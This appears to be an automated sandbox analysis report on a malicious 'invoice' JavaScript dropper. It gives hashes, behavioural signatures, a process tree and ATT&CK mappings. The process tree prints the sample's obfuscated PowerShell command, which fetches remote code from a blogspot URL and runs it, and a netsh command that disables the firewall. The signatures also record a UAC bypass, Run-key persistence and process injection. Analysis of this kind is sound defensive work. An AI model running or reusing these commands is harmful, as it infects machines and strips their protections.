Analysis
-
max time kernel
142s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20231127-en -
resource tags
arch:x64arch:x86image:win10v2004-20231127-enlocale:en-usos:windows10-2004-x64system -
submitted
01-12-2023 07:17
Static task
static1
Behavioral task
behavioral1
Sample
invoice_2566246817.js
Resource
win7-20231023-en
Behavioral task
behavioral2
Sample
invoice_2566246817.js
Resource
win10v2004-20231127-en
General
-
Target
invoice_2566246817.js
-
Size
106KB
-
MD5
fc6d7a11059fee2eda2bab5e4c82c839
-
SHA1
9907895c521bddd02573ca5e361490f017932dbe
-
SHA256
39afb67d0916e6761f7604cb65ebdb1c115f24e62d9b122c0137b46215a0b00c
-
SHA512
1e820c22e9cbd0f360b7187eb8062089ead22cfd1a62e0e47450523659b841bf37278ddfd530c4792529d88145ceb1ff88389d541fda9e68d9c127ba5579fb39
-
SSDEEP
384:boJdyttnpXrov4gPyjjF/9sui+1VaEEEfEfffEfEffESxyOVYZPjcrdRoDT/8W8z:kS5W
Malware Config
Signatures
-
Processes:
powershell.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" powershell.exe -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 10 1812 powershell.exe 13 1812 powershell.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
wscript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3028534956-1709433221-1313273668-1000\Control Panel\International\Geo\Nation wscript.exe -
Registers COM server for autorun 1 TTPs 2 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3028534956-1709433221-1313273668-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3028534956-1709433221-1313273668-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3028534956-1709433221-1313273668-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Deefenasdensossl1 = "schtasks /run /tn Deefenasdensossl1" powershell.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 34 api.ipify.org 35 api.ipify.org -
Suspicious use of SetThreadContext 3 IoCs
Processes:
powershell.exedescription pid process target process PID 1812 set thread context of 2708 1812 powershell.exe RegSvcs.exe PID 1812 set thread context of 2776 1812 powershell.exe RegSvcs.exe PID 1812 set thread context of 1748 1812 powershell.exe Msbuild.exe -
Drops file in Windows directory 1 IoCs
Processes:
dw20.exedescription ioc process File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp dw20.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
dw20.exedw20.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
dw20.exedw20.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe -
Modifies registry class 3 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3028534956-1709433221-1313273668-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3028534956-1709433221-1313273668-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" powershell.exe Key created \REGISTRY\USER\S-1-5-21-3028534956-1709433221-1313273668-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} powershell.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.exeRegSvcs.exepid process 1812 powershell.exe 1812 powershell.exe 1812 powershell.exe 1812 powershell.exe 1812 powershell.exe 1812 powershell.exe 1812 powershell.exe 2708 RegSvcs.exe 2708 RegSvcs.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exedw20.exedw20.exeRegSvcs.exedescription pid process Token: SeDebugPrivilege 1812 powershell.exe Token: SeRestorePrivilege 1832 dw20.exe Token: SeBackupPrivilege 1832 dw20.exe Token: SeBackupPrivilege 1832 dw20.exe Token: SeRestorePrivilege 2716 dw20.exe Token: SeBackupPrivilege 2716 dw20.exe Token: SeBackupPrivilege 2716 dw20.exe Token: SeBackupPrivilege 2716 dw20.exe Token: SeBackupPrivilege 2716 dw20.exe Token: SeBackupPrivilege 1832 dw20.exe Token: SeBackupPrivilege 1832 dw20.exe Token: SeDebugPrivilege 2708 RegSvcs.exe Token: SeIncreaseQuotaPrivilege 1812 powershell.exe Token: SeSecurityPrivilege 1812 powershell.exe Token: SeTakeOwnershipPrivilege 1812 powershell.exe Token: SeLoadDriverPrivilege 1812 powershell.exe Token: SeSystemProfilePrivilege 1812 powershell.exe Token: SeSystemtimePrivilege 1812 powershell.exe Token: SeProfSingleProcessPrivilege 1812 powershell.exe Token: SeIncBasePriorityPrivilege 1812 powershell.exe Token: SeCreatePagefilePrivilege 1812 powershell.exe Token: SeBackupPrivilege 1812 powershell.exe Token: SeRestorePrivilege 1812 powershell.exe Token: SeShutdownPrivilege 1812 powershell.exe Token: SeDebugPrivilege 1812 powershell.exe Token: SeSystemEnvironmentPrivilege 1812 powershell.exe Token: SeRemoteShutdownPrivilege 1812 powershell.exe Token: SeUndockPrivilege 1812 powershell.exe Token: SeManageVolumePrivilege 1812 powershell.exe Token: 33 1812 powershell.exe Token: 34 1812 powershell.exe Token: 35 1812 powershell.exe Token: 36 1812 powershell.exe Token: SeIncreaseQuotaPrivilege 1812 powershell.exe Token: SeSecurityPrivilege 1812 powershell.exe Token: SeTakeOwnershipPrivilege 1812 powershell.exe Token: SeLoadDriverPrivilege 1812 powershell.exe Token: SeSystemProfilePrivilege 1812 powershell.exe Token: SeSystemtimePrivilege 1812 powershell.exe Token: SeProfSingleProcessPrivilege 1812 powershell.exe Token: SeIncBasePriorityPrivilege 1812 powershell.exe Token: SeCreatePagefilePrivilege 1812 powershell.exe Token: SeBackupPrivilege 1812 powershell.exe Token: SeRestorePrivilege 1812 powershell.exe Token: SeShutdownPrivilege 1812 powershell.exe Token: SeDebugPrivilege 1812 powershell.exe Token: SeSystemEnvironmentPrivilege 1812 powershell.exe Token: SeRemoteShutdownPrivilege 1812 powershell.exe Token: SeUndockPrivilege 1812 powershell.exe Token: SeManageVolumePrivilege 1812 powershell.exe Token: 33 1812 powershell.exe Token: 34 1812 powershell.exe Token: 35 1812 powershell.exe Token: 36 1812 powershell.exe Token: SeIncreaseQuotaPrivilege 1812 powershell.exe Token: SeSecurityPrivilege 1812 powershell.exe Token: SeTakeOwnershipPrivilege 1812 powershell.exe Token: SeLoadDriverPrivilege 1812 powershell.exe Token: SeSystemProfilePrivilege 1812 powershell.exe Token: SeSystemtimePrivilege 1812 powershell.exe Token: SeProfSingleProcessPrivilege 1812 powershell.exe Token: SeIncBasePriorityPrivilege 1812 powershell.exe Token: SeCreatePagefilePrivilege 1812 powershell.exe Token: SeBackupPrivilege 1812 powershell.exe -
Suspicious use of WriteProcessMemory 38 IoCs
Processes:
wscript.exepowershell.execsc.exeRegSvcs.exeMsbuild.exedescription pid process target process PID 4672 wrote to memory of 1812 4672 wscript.exe powershell.exe PID 4672 wrote to memory of 1812 4672 wscript.exe powershell.exe PID 1812 wrote to memory of 3996 1812 powershell.exe csc.exe PID 1812 wrote to memory of 3996 1812 powershell.exe csc.exe PID 3996 wrote to memory of 4700 3996 csc.exe cvtres.exe PID 3996 wrote to memory of 4700 3996 csc.exe cvtres.exe PID 1812 wrote to memory of 1696 1812 powershell.exe netsh.exe PID 1812 wrote to memory of 1696 1812 powershell.exe netsh.exe PID 1812 wrote to memory of 2708 1812 powershell.exe RegSvcs.exe PID 1812 wrote to memory of 2708 1812 powershell.exe RegSvcs.exe PID 1812 wrote to memory of 2708 1812 powershell.exe RegSvcs.exe PID 1812 wrote to memory of 2708 1812 powershell.exe RegSvcs.exe PID 1812 wrote to memory of 2708 1812 powershell.exe RegSvcs.exe PID 1812 wrote to memory of 2708 1812 powershell.exe RegSvcs.exe PID 1812 wrote to memory of 2708 1812 powershell.exe RegSvcs.exe PID 1812 wrote to memory of 2708 1812 powershell.exe RegSvcs.exe PID 1812 wrote to memory of 2776 1812 powershell.exe RegSvcs.exe PID 1812 wrote to memory of 2776 1812 powershell.exe RegSvcs.exe PID 1812 wrote to memory of 2776 1812 powershell.exe RegSvcs.exe PID 1812 wrote to memory of 2776 1812 powershell.exe RegSvcs.exe PID 1812 wrote to memory of 2776 1812 powershell.exe RegSvcs.exe PID 1812 wrote to memory of 2776 1812 powershell.exe RegSvcs.exe PID 1812 wrote to memory of 2776 1812 powershell.exe RegSvcs.exe PID 1812 wrote to memory of 2776 1812 powershell.exe RegSvcs.exe PID 1812 wrote to memory of 1748 1812 powershell.exe Msbuild.exe PID 1812 wrote to memory of 1748 1812 powershell.exe Msbuild.exe PID 1812 wrote to memory of 1748 1812 powershell.exe Msbuild.exe PID 1812 wrote to memory of 1748 1812 powershell.exe Msbuild.exe PID 1812 wrote to memory of 1748 1812 powershell.exe Msbuild.exe PID 1812 wrote to memory of 1748 1812 powershell.exe Msbuild.exe PID 1812 wrote to memory of 1748 1812 powershell.exe Msbuild.exe PID 1812 wrote to memory of 1748 1812 powershell.exe Msbuild.exe PID 2776 wrote to memory of 2716 2776 RegSvcs.exe dw20.exe PID 2776 wrote to memory of 2716 2776 RegSvcs.exe dw20.exe PID 2776 wrote to memory of 2716 2776 RegSvcs.exe dw20.exe PID 1748 wrote to memory of 1832 1748 Msbuild.exe dw20.exe PID 1748 wrote to memory of 1832 1748 Msbuild.exe dw20.exe PID 1748 wrote to memory of 1832 1748 Msbuild.exe dw20.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\invoice_2566246817.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4672 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c $((irm hotelofficeewn.blogspot.com////////////////////////////////////atom.xml) | .('{1}{0}'-f'kasokdaoskdoaksodkasodkaoskdoaksdoaksod','I').replace('kasokdaoskdoaksodkasodkaoskdoaksdoaksod','ex'))2⤵
- UAC bypass
- Blocklisted process makes network request
- Registers COM server for autorun
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1812 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mpw4uqrx\mpw4uqrx.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:3996 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES978D.tmp" "c:\Users\Admin\AppData\Local\Temp\mpw4uqrx\CSC38DF9718EE75440CB0CB3ACD74F1C2AF.TMP"4⤵PID:4700
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off -ErrorAction SilentlyContinue3⤵
- Modifies Windows Firewall
PID:1696 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2708 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:2776 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7124⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:2716 -
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:1748 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7804⤵
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:1832
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
1Windows Service
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
1Windows Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5adfbcfe3be9e7947fff3041c6decc7f9
SHA197f4fab4c8800f6f806d710c51315b440e3ff30a
SHA256b56b559c5742a6dba6d0b52246e413ce0d9c313086ba0c29f2ebe2c2b5746d9c
SHA5121094fb647eb375c14be2de33ee43382ce539454a3877a8b32626b1b555da8a155a98ffc3a9699e213c3411d8a832d5b8d3a014d1acd5cfe6f211f235d80e4601
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD5fb161a4f2584ad6edebe7308974f7a5b
SHA1f1fe77e2ba778da930e72826970b2333b922d056
SHA256607e8c03f46a24500730448d7e473762fb1934d1a5ca7c57101f933e47b42182
SHA5124e214a027282b93f506759138e4329a9c444114273fbd4b7ff7c2700345b685dc2e8423e9dece5df1625fbf023ce579808c10491078bb36bc79495b84b91688b
-
Filesize
652B
MD57c83994367be999d72a7d0186eb257cd
SHA1302e7fa60a637f55180bb9cfbafb05c33a437e31
SHA2566462dceb7d1d7324dbd2707e627efd20b27d6fc99294160f2ca9d68798dd06c6
SHA51262d5d2dcd1b35daec7381ccb44b83fc61a0c7674b34c9f50338818d590d7bb9c624196528b0d855437806fa52cdf290e35e86a7c825571c83352cf8bf0588943
-
Filesize
870B
MD5e06ebf853695db38aaac82c9af297ae4
SHA1ef98bacec5ac2ae3bf24aac8ed56935a25c1f064
SHA25679c1099bad1dccb1d151887071b8e8b5d679de343903895fa28e45b791cae344
SHA512036449d932066d506a6bd7c08df311bf1ed5e7b3595004941fe1c39a8e9f9b0d08d43b33a180d4851f88d49c98a17b05cf5235858ada611306fc602cfd582759
-
Filesize
369B
MD5fd735ae5110224d3a7d478e5a96ba551
SHA1a989117aa6026048ce233df6ae189f8e5b3aefd3
SHA25652a60db51c3d936c446563eac77eaa6bc9d237437e21a28a574e1843ffb3b044
SHA5122e6d7b0b754de1f9397dfb4f727a8d3215e5fe5838e5f41937830f41280ede65f2c250f4fde50ab7abf17517fe13cb764d1792814f0544deb6f30c0185796f75